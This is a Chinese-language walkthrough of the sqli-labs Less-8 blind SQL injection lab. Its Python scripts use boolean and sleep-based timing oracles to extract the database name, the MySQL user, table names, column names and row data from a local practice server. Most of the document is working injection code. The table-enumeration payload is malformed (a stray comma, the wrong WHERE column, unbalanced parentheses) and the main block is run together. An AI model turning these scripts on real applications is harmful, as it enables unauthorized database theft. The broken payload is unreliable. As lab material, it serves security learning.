在 sqli-labs 的第 8 題中，頁面無回顯，可以嘗試用盲注的手法獲取數據
發現頁面加載了3秒左右可以進行盲注
布爾盲注數據庫名
import requests

def inject_database(url):
    """Recover the value of MySQL ``database()`` one character at a time.

    Boolean-based oracle: the injected condition
    ``ascii(substr(database(), i, 1)) > mid`` is judged true when the string
    "You are in..........." appears in the response body.  For each position
    ``i`` (at most 14) the ASCII value is binary-searched in [32, 128); a
    result of 32 is taken to mean "no more characters" and ends the loop.

    Args:
        url: Base URL of the lab page (the script points at the local
            sqli-labs Less-8 instance).

    Returns:
        None; the name recovered so far is printed after every character.

    The exercise relies on the lab page splicing the ``id`` value into its
    SQL unescaped; a parameterized query on the server side would make this
    condition inert.
    """
    dataname=''
    for i in range(1,15):
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:
            # The query string is built by hand and passed positionally;
            # ``requests.get``'s second positional parameter is ``params``.
            path = "id=1' and ascii(substr(database(),%d, 1)) > %d-- " % (i,mid)
            r = requests.get(url,path)
            if "You are in..........." in r.text:
                low = mid + 1
            else :
                high = mid
            # Narrow the window; when the loop exits low == high == mid.
            mid = (low + high) // 2
        # 32 (space) is used as the end-of-string marker.
        if mid == 32:
            break
        dataname += chr(mid)
        print(dataname)

if __name__=='__main__':
    url = 'http://127.0.0.1:8989/Less-8/'
    inject_database(url)
結果
用時間盲注出用戶名
import requests
import time

def inject_user(url):
    """Recover the value of MySQL ``user()`` one character at a time.

    Time-based oracle: the ``id`` parameter carries
    ``if(ascii(substr(user(), i, 1)) > mid, sleep(1), 0)`` and the condition
    is judged true when the round trip takes longer than one second.  Each
    position (at most 14) is binary-searched in [32, 128); a result of 32 is
    taken as end of string.

    Args:
        url: Base URL of the lab page (local sqli-labs Less-8 instance).

    Returns:
        None; the value recovered so far is printed after every character.

    NOTE(review): the 1 s threshold is compared against wall-clock time
    around the whole request, so it also includes network and server
    latency, not only the injected ``sleep``.
    """
    user=''
    for i in range(1,15):
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:
            payload = f"1' and if(ascii(substr(user(), {i}, 1)) > {mid},sleep(1),0)-- "
            res = {"id":payload}
            start_time = time.time()
            r = requests.get(url,params=res)
            if (time.time() - start_time)>1:
                # Condition held: the response was delayed.
                low = mid + 1
            else :
                high = mid
            # Narrow the window; when the loop exits low == high == mid.
            mid = (low + high) // 2
        # 32 (space) is used as the end-of-string marker.
        if mid == 32:
            break
        user += chr(mid)
        print(user)

if __name__=='__main__':
    url = 'http://127.0.0.1:8989/Less-8/'
    inject_user(url)
結果
用盲注的方式查詢表名、列名與具體數據
if __name__ == '__main__':url = 'http://127.0.0.1:8989/Less-8/'# 獲取當前數據庫名database_name = inject_database(url)print(f"Database name: {database_name}")# 獲取數據庫中的表名tables = inject_tables(url, database_name)print(f"Tables in database '{database_name}': {tables}")# 獲取指定表中的列名table_name = 'users' # 替換為目標表名columns = inject_columns(url, table_name)print(f"Columns in table '{table_name}': {columns}")# 獲取指定表中特定列的數據column_name = 'username' # 替換為目標列名data = inject_data(url, table_name, column_name)print(f"Data in column '{column_name}' of table '{table_name}': {data}")
時間檢測模塊
# Send one probe and classify it by response time.
def check_time_injection(url, payload):
    """Return True when the request with ``id=payload`` took more than 1 s.

    ``payload`` is sent as the ``id`` query parameter.  The delay is measured
    with wall-clock ``time.time()`` around the whole ``requests.get`` call,
    so it includes network and server latency, not only the injected
    ``sleep``.  The 1 s threshold is an assumption (original comment) that
    matches the ``sleep(1)`` the callers on this page inject.

    A full extraction issues one such request per binary-search step, and
    every "true" step costs at least the sleep delay; that long, regular
    stream of near-identical slow requests to a single endpoint is the
    footprint a server-side log review would key on.
    """
    res = {"id": payload}
    start_time = time.time()
    r = requests.get(url, params=res)
    elapsed_time = time.time() - start_time
    return elapsed_time > 1 # assumed: a delay over 1 s means the condition held
數據庫模塊
# Recover the current database name.
def inject_database(url):
    """Recover the value of MySQL ``database()`` one character at a time.

    Boolean-based oracle: the condition ``ascii(substr(database(), i, 1)) >
    mid`` is sent as the ``id`` query parameter and judged true when the
    string "You are in..........." appears in the response body.  Each
    position (at most 14) is binary-searched in [32, 128); a result of 32 is
    taken as end of string.

    Args:
        url: Base URL of the lab page.

    Returns:
        The recovered name (possibly empty); it is also printed as it grows.
    """
    dataname=''
    for i in range(1,15):
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:
            payload = "1' and ascii(substr(database(),%d, 1)) > %d-- " % (i,mid)
            res = {"id":payload}
            r = requests.get(url,params=res)
            if "You are in..........." in r.text:
                low = mid + 1
            else :
                high = mid
            # Narrow the window; when the loop exits low == high == mid.
            mid = (low + high) // 2
        # 32 (space) is used as the end-of-string marker.
        if mid == 32:
            break
        dataname += chr(mid)
        print(dataname)
    return dataname
數據庫中表名模塊
# Recover table names from the given database.
def inject_tables(url, database_name):
    """Enumerate table names via the time-based oracle.

    The outer loop walks rows of ``information_schema.tables`` with
    ``limit {table_index-1},1``; for each row up to 19 character positions
    are binary-searched in [32, 128) through ``check_time_injection``.  A
    position resolving to 32 ends the current name, and an empty name ends
    the enumeration.

    Args:
        url: Base URL of the lab page.
        database_name: Name interpolated into the probe's WHERE clause.

    Returns:
        List of recovered names; progress is printed along the way.

    NOTE(review): there is no upper bound on the row index, so the loop
    relies on an eventual empty name to stop.
    """
    tables = []
    table_index = 0
    while True:
        table_index += 1
        table_name = ''
        for i in range(1, 20): # assumes the name fits in 19 positions (original note: <= 20 chars)
            low = 32
            high = 128
            while low < high:
                mid = (low + high) // 2
                payload = f",' and if(ascii(substr(select table_name from information_schema.tables where table_name='{database_name}' limit {table_index-1},1),{i},1 > {mid},sleep(1),0)-- "
                if check_time_injection(url, payload):
                    low = mid + 1
                else:
                    high = mid
            # When the search exits low == high holds the resolved value.
            if low == 32: # ASCII 32 (space) is taken to mean end of string
                break
            table_name += chr(low)
            print(f"Current table name: {table_name}")
        if table_name:
            tables.append(table_name)
            print(f"Found table: {table_name}")
        else:
            break
    return tables
列名模塊
def inject_columns(url, table_name):
    """Enumerate column names of ``table_name`` via the time-based oracle.

    The outer loop walks rows of ``information_schema.columns`` for the
    given table with ``limit {column_index-1},1``; for each row up to 19
    character positions are binary-searched in [32, 128) through
    ``check_time_injection``.  A position resolving to 32 ends the current
    name, and an empty name ends the enumeration.

    Args:
        url: Base URL of the lab page.
        table_name: Name interpolated into the probe's WHERE clause.

    Returns:
        List of recovered column names; progress is printed along the way.

    NOTE(review): there is no upper bound on the row index, so the loop
    relies on an eventual empty name to stop.
    """
    columns = []
    column_index = 0
    while True:
        column_index += 1
        column_name = ''
        for i in range(1, 20): # assumes the name fits in 19 positions (original note: <= 20 chars)
            low = 32
            high = 128
            while low < high:
                mid = (low + high) // 2
                payload = f"1' and if(ascii(substr((select column_name from information_schema.columns where table_name='{table_name}' limit {column_index-1},1),{i},1)) > {mid},sleep(1),0) -- "
                if check_time_injection(url, payload):
                    low = mid + 1
                else:
                    high = mid
            # When the search exits low == high holds the resolved value.
            if low == 32: # ASCII 32 (space) is taken to mean end of string
                break
            column_name += chr(low)
            print(f"Current column name: {column_name}")
        if column_name:
            columns.append(column_name)
            print(f"Found column: {column_name}")
        else:
            break
    return columns
指定查詢數據模塊
# Recover the values of one column of the given table.
def inject_data(url, table_name, column_name):
    """Read ``column_name`` of ``table_name`` row by row via the time-based oracle.

    The outer loop selects one row at a time with ``limit {row_index-1},1``;
    for each row up to 19 character positions are binary-searched in
    [32, 128) through ``check_time_injection``.  A position resolving to 32
    ends the current value, and an empty value ends the enumeration.

    Args:
        url: Base URL of the lab page.
        table_name: Table name interpolated into the probe.
        column_name: Column name interpolated into the probe.

    Returns:
        List of recovered values; progress is printed along the way.

    NOTE(review): there is no upper bound on the row index, so the loop
    relies on an eventual empty value to stop.
    """
    data = []
    row_index = 0
    while True:
        row_index += 1
        row_value = ''
        for i in range(1, 20): # assumes the value fits in 19 positions (original note: <= 20 chars)
            low = 32
            high = 128
            while low < high:
                mid = (low + high) // 2
                payload = f"1' and if(ascii(substr((select {column_name} from {table_name} limit {row_index-1},1),{i},1)) > {mid},sleep(1),0) -- "
                if check_time_injection(url, payload):
                    low = mid + 1
                else:
                    high = mid
            # When the search exits low == high holds the resolved value.
            if low == 32: # ASCII 32 (space) is taken to mean end of string
                break
            row_value += chr(low)
            print(f"Current row value: {row_value}")
        if row_value:
            data.append(row_value)
            print(f"Found data: {row_value}")
        else:
            break
    return data
結果
數據庫
列
user